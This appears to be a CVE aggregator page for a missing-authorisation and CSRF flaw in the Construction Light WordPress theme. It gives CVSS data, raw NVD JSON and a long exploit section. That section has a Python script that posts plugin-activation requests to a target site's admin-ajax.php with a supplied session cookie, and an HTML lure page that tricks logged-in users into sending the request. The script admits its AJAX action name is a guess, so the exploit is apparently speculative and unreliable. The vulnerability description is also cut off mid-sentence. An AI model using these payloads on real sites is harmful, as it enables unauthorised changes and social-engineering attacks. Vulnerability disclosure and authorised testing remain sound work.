Security Vulnerability Report
中文
CVE-2025-10684 CVSS 4.3 MEDIUM

CVE-2025-10684

Published: 2025-12-12 06:15:40
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Construction Light WordPress theme before 1.6.8 does not have authorisation and CSRF when activating via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary .

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Construction Light Theme < 1.6.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10684 PoC - Construction Light Theme Unauthorized Plugin Activation # This PoC demonstrates how an attacker can activate arbitrary plugins via AJAX import requests import sys from urllib.parse import urljoin def exploit_unauthorized_plugin_activation(target_url, target_plugin, cookie=None): """ Exploit for CVE-2025-10684: Missing authorization and CSRF in Construction Light theme Allows any authenticated user (e.g., subscriber) to activate arbitrary plugins Args: target_url: Target WordPress site URL target_plugin: Plugin path to activate (e.g., 'hello-dolly/hello.php') cookie: Authentication cookie (WordPress session cookie) """ # AJAX endpoint ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php') # The vulnerable AJAX action - typically related to plugin activation # Replace 'construction_light_activate_plugin' with the actual action name data = { 'action': 'construction_light_activate_plugin', # Vulnerable action 'plugin': target_plugin, # Arbitrary plugin path 'nonce': '' # Missing nonce verification (CSRF vulnerability) } headers = { 'Content-Type': 'application/x-www-form-urlencoded', } if cookie: headers['Cookie'] = cookie print(f'[*] Target: {target_url}') print(f'[*] Plugin to activate: {target_plugin}') print(f'[*] Sending AJAX request to: {ajax_url}') try: response = requests.post(ajax_url, data=data, headers=headers, timeout=30) print(f'[*] Response Status: {response.status_code}') print(f'[*] Response Body: {response.text}') if 'success' in response.text.lower() or response.status_code == 200: print('[+] Plugin activation request sent successfully') print('[!] Note: Requires authenticated user with any role (subscriber+) on target') else: print('[-] Request may have failed or requires valid authentication') except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') # HTML PoC for social engineering attack html_poc = ''' <!-- CSRF PoC for CVE-2025-10684 --> <!-- Trick authenticated user into activating arbitrary plugin --> <html> <body> <h1>Construction Light Theme - Plugin Activation Exploit</h1> <p>Click the button below to activate the target plugin...</p> <button onclick="exploit()">Continue</button> <script> function exploit() { // Target plugin to activate const targetPlugin = 'hello-dolly/hello.php'; // AJAX request to vulnerable endpoint fetch('/wp-admin/admin-ajax.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: new URLSearchParams({ 'action': 'construction_light_activate_plugin', 'plugin': targetPlugin }), credentials: 'include' // Include authentication cookies }) .then(response => response.text()) .then(data => { console.log('Response:', data); alert('Plugin activation requested'); }) .catch(error => { console.error('Error:', error); }); } </script> </body> </html> ''' if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-10684.py <target_url> <plugin_path> [cookie]') print('Example: python cve-2025-10684.py http://example.com hello-dolly/hello.php') sys.exit(1) target = sys.argv[1] plugin = sys.argv[2] cookie = sys.argv[3] if len(sys.argv) > 3 else None exploit_unauthorized_plugin_activation(target, plugin, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10684", "sourceIdentifier": "[email protected]", "published": "2025-12-12T06:15:40.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Construction Light WordPress theme before 1.6.8 does not have authorisation and CSRF when activating via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary ."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://wpscan.com/vulnerability/cfabf8b2-30a4-462f-996c-79888a439c09/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.